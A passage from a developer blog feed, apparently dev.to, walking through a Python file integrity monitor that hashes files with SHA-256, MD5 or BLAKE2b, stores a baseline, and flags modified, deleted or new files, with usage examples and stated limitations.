Build this lab, then hunt for similar vulns in open-source repos.</li> </ul> <p>Open Redirects remind us: Security isn't about complexity; it's about vigilance.</p> cybersecurity python webdev programming Day 19 — How I Built a File Integrity Monitor in Python to Detect File Tampering Hafiz Shamnad Sat, 07 Mar 2026 05:17:35 +0000 https://forem.com/hafiz_shamnad/day-20-how-i-built-a-file-integrity-monitor-in-python-to-detect-file-tampering-260p https://forem.com/hafiz_shamnad/day-20-how-i-built-a-file-integrity-monitor-in-python-to-detect-file-tampering-260p <p>What if one of your critical system files changed right now?</p> <p>Would you notice?</p> <p>Attackers rarely need to install complex malware. Often they simply modify existing files — a web server script, a cron job, or a configuration file.</p> <p>That tiny change can be the difference between a secure system and a persistent backdoor.</p> <h2> This is exactly the problem File Integrity Monitoring solves. </h2> <h2> Introduction </h2> <p>Every system administrator or security engineer has faced the same unsettling question at some point: <em>has this file been tampered with?</em> Whether it's a config file silently modified by malware, a binary swapped out during a supply-chain attack, or a web asset defaced by an intruder — unauthorized file changes are one of the most common indicators of compromise.</p> <p><strong>FIM (File Integrity Monitor)</strong> is a lightweight, terminal-native Python tool that answers that question definitively. It uses cryptographic hashing to create a trusted snapshot of your files and then compares future states against that snapshot — flagging any modifications, deletions, or suspicious new additions.</p> <p>This post walks through how FIM works, how to use it, what features it offers, and the security principles that power it under the hood.</p> <h2> The Security Problem: Why File Integrity Monitoring Matters </h2> <p>Before diving into the code, it's worth understanding <em>why</em> this kind of tool exists in the first place.</p> <h3> Detecting Unauthorized Changes </h3> <p>Attackers who compromise a system often need to modify files to maintain persistence — think webshells dropped into <code>/var/www</code>, backdoors inserted into system binaries, or cron jobs quietly added to <code>/etc/cron.d</code>. A file integrity monitor acts as a silent watchdog. It doesn't prevent the change, but it makes the change <em>impossible to hide</em>.</p> <h3> Compliance Requirements </h3> <p>Many security frameworks mandate file integrity monitoring as a control. PCI-DSS (Requirement 11.5), HIPAA, and NIST 800-53 all reference it as a critical baseline measure. Tools like Tripwire and AIDE have been the enterprise standard for years, but they're heavy, complex to configure, and overkill for a developer's machine, a small server, or a CTF lab environment. FIM fills that gap.</p> <h3> Forensic Baseline </h3> <p>In incident response, one of the first things investigators need is a clean baseline — what did the system look like <em>before</em> the incident? A pre-breach FIM snapshot is invaluable for answering that question quickly.</p> <h3> Architecture Overview </h3> <p>FIM follows a simple pipeline:</p> <p>Directory → File Scanner → Hash Generator → Baseline Database → Integrity Checker</p> <ol> <li>Files are recursively scanned</li> <li>Cryptographic hashes are generated</li> <li>Baseline fingerprints are stored</li> <li>Future scans compare current hashes against the baseline</li> </ol> <h2> 5. Differences are reported </h2> <h2> How It Works </h2> <p>FIM operates on a simple but cryptographically sound two-phase model.</p> <h3> Phase 1 — Baseline Creation </h3> <p>When you run FIM with the <code>--init</code> flag, it walks the target directory recursively, computes a cryptographic hash of every file, and stores the results in a <code>baseline.json</code> file. This JSON file is your trusted ground truth — a fingerprint of the directory at a known-good point in time.</p> <p>Each entry in the baseline captures:</p> <ul> <li> <strong>The file path</strong> — the full path to the file</li> <li> <strong>The hash</strong> — a fixed-length digest derived from the file's contents</li> <li> <strong>The algorithm</strong> — SHA-256 by default, but configurable</li> <li> <strong>File metadata</strong> — size, last-modified timestamp, and permissions</li> </ul> <h3> Phase 2 — Integrity Scanning </h3> <p>When you run FIM with the <code>--scan</code> flag, it recomputes hashes of all current files and compares them against the stored baseline. It then reports three categories of change:</p> <ul> <li> <strong>Modified</strong> — the file still exists, but its hash no longer matches</li> <li> <strong>Deleted</strong> — the file was in the baseline but is no longer present on disk</li> <li> <strong>New</strong> — the file exists on disk but was not in the baseline</li> </ul> <p>This three-way classification is important. A legitimate software update might add new files; that's different from a file being <em>secretly modified</em>. FIM gives you the full picture.</p> <h2> Cryptographic Hashing: The Engine Behind FIM </h2> <p>At the core of file integrity monitoring is a single idea: a cryptographic hash function produces a deterministic, fixed-length "fingerprint" of any input. Change even a single bit of the input, and the output changes completely and unpredictably. This property — called the <strong>avalanche effect</strong> — is what makes hashing ideal for tamper detection.</p> <p>FIM supports three hashing algorithms, each with different trade-offs:</p> <h3> SHA-256 (Default) </h3> <p>SHA-256 is part of the SHA-2 family, standardized by NIST. It produces a 256-bit (64-character hex) digest and is the gold standard for general-purpose integrity checking. It's used in TLS certificates, Git commit IDs, and Bitcoin. For most use cases, SHA-256 is the right choice — fast, widely supported, and collision-resistant for all practical purposes.</p> <h3> MD5 </h3> <p>MD5 is fast and produces a compact 128-bit digest. However, it is <strong>cryptographically broken</strong> — researchers have demonstrated practical collision attacks, meaning two different files can produce the same MD5 hash. FIM includes MD5 for legacy compatibility and speed in low-risk contexts, but it should not be relied upon in security-sensitive scenarios. Use SHA-256 or BLAKE2 instead.</p> <h3> BLAKE2b </h3> <p>BLAKE2 is a modern hashing algorithm designed to be faster than SHA-256 while maintaining strong security guarantees. It's the recommended choice when you need high throughput — scanning large directories with many big files, for example. BLAKE2b is used in WireGuard, libsodium, and numerous modern cryptographic systems.</p> <p><strong>Summary:</strong></p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Algorithm</th> <th>Digest Size</th> <th>Speed</th> <th>Security</th> <th>Best For</th> </tr> </thead> <tbody> <tr> <td>SHA-256</td> <td>256-bit</td> <td>Fast</td> <td>Strong</td> <td>General use (default)</td> </tr> <tr> <td>MD5</td> <td>128-bit</td> <td>Fastest</td> <td>Broken</td> <td>Legacy / low-stakes</td> </tr> <tr> <td>BLAKE2b</td> <td>512-bit</td> <td>Fastest</td> <td>Very Strong</td> <td>Large-scale scanning</td> </tr> </tbody> </table></div> <h2> Code explanation </h2> <h3> 1. Shebang and Header </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span></code></pre> </div> <p>This tells Linux/Unix systems to run the script using <strong>Python 3 from the system environment</strong>.</p> <p>The large ASCII block is simply <strong>branding and documentation</strong> for the tool:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>FIM - File Integrity Monitor v2.0 Developed by Hafiz Shamnad SHA-256 | MD5 | Blake2 Hashing Security </code></pre> </div> <p>It has <strong>no functional effect</strong>, but improves CLI UX.</p> <h3> 2. Importing Required Libraries </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">sys</span> <span class="kn">import</span> <span class="n">hashlib</span> <span class="kn">import</span> <span class="n">json</span> <span class="kn">import</span> <span class="n">argparse</span> <span class="kn">import</span> <span class="n">time</span> <span class="kn">import</span> <span class="n">datetime</span> <span class="kn">import</span> <span class="n">platform</span> <span class="kn">import</span> <span class="n">stat</span> <span class="kn">from</span> <span class="n">pathlib</span> <span class="kn">import</span> <span class="n">Path</span> </code></pre> </div> <p>These are <strong>all standard Python libraries</strong>.</p> <p>What each one does:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Library</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td><code>os</code></td> <td>filesystem traversal</td> </tr> <tr> <td><code>sys</code></td> <td>Python runtime info</td> </tr> <tr> <td><code>hashlib</code></td> <td>cryptographic hashing</td> </tr> <tr> <td><code>json</code></td> <td>storing baseline database</td> </tr> <tr> <td><code>argparse</code></td> <td>command-line arguments</td> </tr> <tr> <td><code>time</code></td> <td>delays in watch mode</td> </tr> <tr> <td><code>datetime</code></td> <td>timestamps</td> </tr> <tr> <td><code>platform</code></td> <td>system info for banner</td> </tr> <tr> <td><code>stat</code></td> <td>file permission extraction</td> </tr> <tr> <td><code>pathlib</code></td> <td>path handling</td> </tr> </tbody> </table></div> <p>No external dependencies means the tool runs on <strong>any Python installation</strong>.</p> <h3> 3. ANSI Color Class (Terminal Styling) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">C</span><span class="p">:</span> </code></pre> </div> <p>This class defines <strong>ANSI escape codes</strong> used for terminal colors.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">RED</span> <span class="o">=</span> <span class="sh">"</span><span class="se">\033</span><span class="s">[31m</span><span class="sh">"</span> <span class="n">GREEN</span> <span class="o">=</span> <span class="sh">"</span><span class="se">\033</span><span class="s">[32m</span><span class="sh">"</span> <span class="n">RESET</span> <span class="o">=</span> <span class="sh">"</span><span class="se">\033</span><span class="s">[0m</span><span class="sh">"</span> </code></pre> </div> <p>These allow output like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[ERROR] printed in red [SUCCESS] printed in green </code></pre> </div> <p>Purpose:</p> <ul> <li>improves CLI readability</li> <li>highlights security events</li> </ul> <p>For example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>MODIFIED files → yellow DELETED files → red NEW files → blue </code></pre> </div> <h3> 4. Global Configuration </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">BASELINE_FILE</span> <span class="o">=</span> <span class="sh">"</span><span class="s">baseline.json</span><span class="sh">"</span> <span class="n">REPORT_FILE</span> <span class="o">=</span> <span class="sh">"</span><span class="s">fim_report.txt</span><span class="sh">"</span> </code></pre> </div> <p>These define:</p> <ul> <li>where the <strong>baseline database</strong> is stored</li> <li>where exported reports are written</li> </ul> <p>The baseline file contains <strong>trusted fingerprints of files</strong>.</p> <h3> 5. Banner Printing </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">print_banner</span><span class="p">():</span> </code></pre> </div> <p>This function prints the startup banner with:</p> <ul> <li>tool name</li> <li>developer name</li> <li>hashing algorithms</li> <li>system OS</li> <li>Python version</li> </ul> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>File Integrity Monitor v2.0 Developed by Hafiz Shamnad Linux · Python 3.11 </code></pre> </div> <p>It uses the <strong>color class</strong> to make the UI look professional.</p> <h3> 6. Helper Functions </h3> <p>Several small utilities simplify the code.</p> <h3> tag() </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">tag</span><span class="p">(</span><span class="n">label</span><span class="p">,</span> <span class="n">color</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span> </code></pre> </div> <p>Creates labeled messages like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[ERROR] Baseline not found </code></pre> </div> <h3> section() </h3> <p>Prints section headers such as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>────────────── CREATE BASELINE ────────────── </code></pre> </div> <h3> progress_bar() </h3> <p>Displays scanning progress:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>████████████░░░░ 65% </code></pre> </div> <p>This improves UX when hashing many files.</p> <h3> human_size() </h3> <p>Converts bytes into readable sizes.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>2048 → 2 KB 1048576 → 1 MB </code></pre> </div> <p>Useful when showing file metadata.</p> <h3> file_meta() </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">file_meta</span><span class="p">(</span><span class="n">path</span><span class="p">):</span> </code></pre> </div> <p>Collects metadata about files:</p> <ul> <li>file size</li> <li>last modification time</li> <li>permissions</li> </ul> <p>Example returned structure:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">1024</span><span class="p">,</span><span class="w"> </span><span class="nl">"modified"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-03-07 12:33:11"</span><span class="p">,</span><span class="w"> </span><span class="nl">"permissions"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0o644"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>This metadata is stored in the baseline.</p> <h3> 7. Hashing Engine </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">ALGORITHMS</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">sha256</span><span class="sh">"</span><span class="p">:</span> <span class="k">lambda</span><span class="p">:</span> <span class="n">hashlib</span><span class="p">.</span><span class="nf">sha256</span><span class="p">(),</span> <span class="sh">"</span><span class="s">md5</span><span class="sh">"</span><span class="p">:</span> <span class="k">lambda</span><span class="p">:</span> <span class="n">hashlib</span><span class="p">.</span><span class="nf">md5</span><span class="p">(),</span> <span class="sh">"</span><span class="s">blake2b</span><span class="sh">"</span><span class="p">:</span> <span class="k">lambda</span><span class="p">:</span> <span class="n">hashlib</span><span class="p">.</span><span class="nf">blake2b</span><span class="p">(),</span> <span class="p">}</span> </code></pre> </div> <p>This dictionary allows dynamic selection of hashing algorithms.</p> <p>Users can run:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>--algo sha256 --algo md5 --algo blake2b </code></pre> </div> <h3> Hashing a File </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">hash_file</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">sha256</span><span class="sh">"</span><span class="p">):</span> </code></pre> </div> <p>Steps:</p> <ol> <li>Create hash object</li> <li>Open file in <strong>binary mode</strong> </li> <li>Read file in chunks</li> <li>Update hash </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">while</span> <span class="n">chunk</span> <span class="p">:</span><span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nf">read</span><span class="p">(</span><span class="mi">8192</span><span class="p">):</span> <span class="n">h</span><span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="n">chunk</span><span class="p">)</span> </code></pre> </div> <p>Reading chunks prevents memory overload for large files.</p> <p>Finally:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">return</span> <span class="n">h</span><span class="p">.</span><span class="nf">hexdigest</span><span class="p">()</span> </code></pre> </div> <p>This returns the <strong>final cryptographic fingerprint</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>9f86d081884c7d659a2feaa0c55ad015... </code></pre> </div> <h3> 8. Directory Scanning Engine </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">scan_directory</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">sha256</span><span class="sh">"</span><span class="p">,</span> <span class="n">extensions</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span> </code></pre> </div> <p>This function performs the <strong>core filesystem analysis</strong>.</p> <p>Steps:</p> <h3> 1. Walk through the directory </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">files</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="nf">walk</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span> </code></pre> </div> <p><code>os.walk()</code> recursively traverses folders.</p> <h3> 2. Filter by extension </h3> <p>If the user specifies:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>--ext .php .html </code></pre> </div> <p>only those files are scanned.</p> <h3> 3. Hash each file </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">file_hash</span> <span class="o">=</span> <span class="nf">hash_file</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">algorithm</span><span class="p">)</span> </code></pre> </div> <h3> 4. Store results </h3> <p>Each file is saved as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">results</span><span class="p">[</span><span class="n">path</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">hash</span><span class="sh">"</span><span class="p">:</span> <span class="n">file_hash</span><span class="p">,</span> <span class="sh">"</span><span class="s">algorithm</span><span class="sh">"</span><span class="p">:</span> <span class="n">algorithm</span><span class="p">,</span> <span class="sh">"</span><span class="s">size</span><span class="sh">"</span><span class="p">:</span> <span class="n">size</span><span class="p">,</span> <span class="sh">"</span><span class="s">modified</span><span class="sh">"</span><span class="p">:</span> <span class="n">time</span><span class="p">,</span> <span class="sh">"</span><span class="s">permissions</span><span class="sh">"</span><span class="p">:</span> <span class="n">perms</span> <span class="p">}</span> </code></pre> </div> <p>This becomes part of the <strong>baseline database</strong>.</p> <h3> 9. Creating the Baseline </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">create_baseline</span><span class="p">(</span><span class="n">directory</span><span class="p">)</span> </code></pre> </div> <p>This function performs <strong>Phase 1 of file integrity monitoring</strong>.</p> <p>Steps:</p> <ol> <li>Scan the directory</li> <li>Generate hashes</li> <li>Collect metadata</li> <li>Store results</li> </ol> <p>The baseline structure looks like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"_meta"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-03-07"</span><span class="p">,</span><span class="w"> </span><span class="nl">"algorithm"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256"</span><span class="p">,</span><span class="w"> </span><span class="nl">"file_count"</span><span class="p">:</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"files"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"/var/www/index.php"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"hash"</span><span class="p">:</span><span class="w"> </span><span class="s2">"..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">1200</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Finally it writes this to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>baseline.json </code></pre> </div> <p>This file becomes the <strong>trusted snapshot</strong>.</p> <h3> 10. Integrity Checking </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">check_integrity</span><span class="p">(</span><span class="n">directory</span><span class="p">)</span> </code></pre> </div> <p>This is <strong>Phase 2</strong>.</p> <p>The function:</p> <ol> <li>Loads <code>baseline.json</code> </li> <li>Scans current files</li> <li>Compares hashes</li> </ol> <p>Three outcomes are detected.</p> <h3> Modified files </h3> <p>Hash mismatch.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[MODIFIED] config.php </code></pre> </div> <h3> Deleted files </h3> <p>File existed before but is missing now.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[DELETED] login.php </code></pre> </div> <h3> New files </h3> <p>File exists but not in baseline.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[NEW] backdoor.php </code></pre> </div> <h3> 11. Exporting Reports </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">_export_report</span><span class="p">()</span> </code></pre> </div> <p>Creates a forensic report:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>fim_report_20260307_134512.txt </code></pre> </div> <p>Report includes:</p> <ul> <li>modified files</li> <li>deleted files</li> <li>new files</li> <li>timestamps</li> </ul> <p>Useful for <strong>incident response documentation</strong>.</p> <h3> 12. File Verification </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> </code></pre> </div> <p>Allows checking a <strong>single file</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python fim.py /etc --verify /etc/passwd </code></pre> </div> <p>The tool:</p> <ol> <li>hashes the file</li> <li>compares it to baseline</li> <li>prints result</li> </ol> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>✔ Hash matches baseline </code></pre> </div> <p>or<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>✘ Hash differs from baseline </code></pre> </div> <h3> 13. Watch Mode (Continuous Monitoring) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">watch_mode</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">interval</span><span class="o">=</span><span class="mi">30</span><span class="p">)</span> </code></pre> </div> <p>This runs integrity checks repeatedly.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python fim.py /var/www --watch </code></pre> </div> <p>Workflow:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Scan #1 Scan #2 Scan #3 </code></pre> </div> <p>If a file changes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>2 issues detected! </code></pre> </div> <p>This approximates <strong>real-time monitoring</strong>.</p> <p>Steps:</p> <ol> <li>Print banner</li> <li>Parse CLI arguments</li> <li>Call the appropriate function</li> </ol> <p>Example flow:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>User command ↓ argparse parses flags ↓ init / scan / watch / verify ↓ FIM executes requested operation </code></pre> </div> <h2> Installation </h2> <p>FIM has no external dependencies — it runs on Python 3.8+ using only the standard library.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Clone or download fim.py, then run directly:</span> python fim.py <span class="nt">--help</span> </code></pre> </div> <p>That's it. No <code>pip install</code>, no virtual environment, no configuration files.</p> <h2> Usage Guide </h2> <h3> Creating a Baseline </h3> <p>Before FIM can detect anything, you need to establish a trusted baseline of your directory. Run this once on a known-clean system:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--init</span> /var/www/html </code></pre> </div> <p>This scans the directory, hashes every file with SHA-256, and saves the results to <code>baseline.json</code>.</p> <p><strong>With a different hashing algorithm:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--init</span> /etc <span class="nt">--algo</span> blake2b </code></pre> </div> <p><strong>Filtering by file type:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--init</span> /var/www <span class="nt">--ext</span> .php .html .js .py </code></pre> </div> <p>Filtering by extension is useful when you only care about specific file types — for example, monitoring only PHP and HTML files in a web root, ignoring uploaded media assets.</p> <h3> Scanning for Changes </h3> <p>Once a baseline exists, run a scan at any time to detect changes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--scan</span> /var/www/html </code></pre> </div> <p>FIM will compare current file hashes against the baseline and print a color-coded report. Modified files appear in yellow, deleted files in red, and new files in blue.</p> <p><strong>Export the scan results to a file:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--scan</span> /var/www/html <span class="nt">--export</span> </code></pre> </div> <p>This generates a timestamped report (e.g., <code>fim_report_20250307_143022.txt</code>) useful for auditing or incident documentation.</p> <h3> Verifying a Single File </h3> <p>Sometimes you just need to quickly check one specific file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--verify</span> /etc/passwd </code></pre> </div> <p>FIM hashes the file, displays its metadata, and checks whether the hash matches the baseline — all in one shot.</p> <h3> Viewing Baseline Info </h3> <p>To inspect the metadata of an existing baseline without running a full scan:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--info</span> <span class="nb">.</span> </code></pre> </div> <p>This shows when the baseline was created, how many files are indexed, the total size, and which algorithm was used.</p> <h3> Continuous Watch Mode </h3> <p>For active monitoring, FIM can run in a loop — rescanning on a configurable interval and alerting you immediately when something changes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python fim.py <span class="nt">--watch</span> /var/www <span class="nt">--interval</span> 60 </code></pre> </div> <p>This rescans every 60 seconds and prints a timestamped status line. A clean scan shows green; any detected changes show red with a count of issues. Press <code>Ctrl+C</code> to stop.</p> <p>Watch mode is particularly useful when you're doing live incident response and want real-time awareness of filesystem changes.</p> <h2> Feature Breakdown </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Flag</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Create baseline</td> <td><code>--init</code></td> <td>Hash all files and save as trusted snapshot</td> </tr> <tr> <td>Scan for changes</td> <td><code>--scan</code></td> <td>Compare current state against baseline</td> </tr> <tr> <td>Single file verify</td> <td><code>--verify FILE</code></td> <td>Hash and check one file immediately</td> </tr> <tr> <td>Baseline info</td> <td><code>--info</code></td> <td>Show metadata about the saved baseline</td> </tr> <tr> <td>Continuous watch</td> <td><code>--watch</code></td> <td>Real-time monitoring loop</td> </tr> <tr> <td>Watch interval</td> <td><code>--interval N</code></td> <td>Set rescan interval in seconds (default: 30)</td> </tr> <tr> <td>Algorithm choice</td> <td><code>--algo</code></td> <td>Choose sha256 / md5 / blake2b</td> </tr> <tr> <td>Extension filter</td> <td><code>--ext</code></td> <td>Only scan specific file extensions</td> </tr> <tr> <td>Export report</td> <td><code>--export</code></td> <td>Save results to a timestamped <code>.txt</code> file</td> </tr> </tbody> </table></div> <h2> Practical Use Cases </h2> <p><strong>Web server protection</strong> — Set up a baseline of <code>/var/www</code> and run a watch scan. Any webshell dropped by an attacker will appear instantly as a new file.</p> <p><strong>Config file auditing</strong> — Monitor <code>/etc</code> to catch unauthorized changes to SSH configs, sudoers, cron jobs, and PAM modules.</p> <p><strong>Software supply chain checks</strong> — Before deploying a software update, scan the package against a known-good baseline to verify no files were tampered with in transit.</p> <p><strong>Post-incident forensics</strong> — Run a scan against a pre-breach baseline to identify exactly which files were touched during an intrusion.</p> <p><strong>CTF challenges</strong> — In competition environments, FIM is a quick way to track what a binary or script is modifying on the filesystem.</p> <h2> Example Scan Output </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fljpq1rmmar357avpuqeo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fljpq1rmmar357avpuqeo.png" alt=" " width="568" height="722"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmr4xn6vhaqu23p7tum62.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmr4xn6vhaqu23p7tum62.png" alt=" " width="786" height="976"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn3uwk99q14py09t47ijy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn3uwk99q14py09t47ijy.png" alt=" " width="516" height="181"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhosf4dgwzqfbom101hrd.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhosf4dgwzqfbom101hrd.png" alt=" " width="528" height="611"></a></p> <h2> Limitations and Honest Caveats </h2> <p>FIM is a practical tool, but it's not a replacement for enterprise solutions in high-stakes production environments. File integrity monitoring is most powerful when combined with logging, intrusion detection systems, and strict access controls.</p> <p>The <code>baseline.json</code> file is only as trustworthy as the system it was created on. If an attacker already has access when you run <code>--init</code>, or if they subsequently modify both the target files <em>and</em> the baseline, FIM cannot detect the deception. In hardened environments, the baseline should be stored on read-only media, a separate host, or protected with access controls.</p> <p>FIM also doesn't monitor in real time at the kernel level the way auditd or inotify-based tools do — it's snapshot-based. The <code>--watch</code> mode approximates real-time monitoring through polling, which introduces a detection window equal to the scan interval.</p> <p>Building a file integrity monitor teaches several important security concepts:</p> <ul> <li>Cryptographic hashing for tamper detection </li> <li>Filesystem traversal and metadata collection </li> <li>Security baselining techniques </li> <li>Incident detection logic </li> <li>CLI security tooling in Python</li> </ul> <h2> Conclusion </h2> <p>FIM demonstrates that powerful security tooling doesn't require heavyweight frameworks or complex configuration. At its heart, it's a practical application of one idea: <em>cryptographic hashes make file tampering detectable</em>. By combining that principle with a clean terminal UI, multi-algorithm support, and a range of monitoring modes, FIM becomes a genuinely useful tool for developers, sysadmins, and security practitioners who want visibility into their filesystems without the overhead of an enterprise solution. Security often starts with visibility.<br> If you don't know when 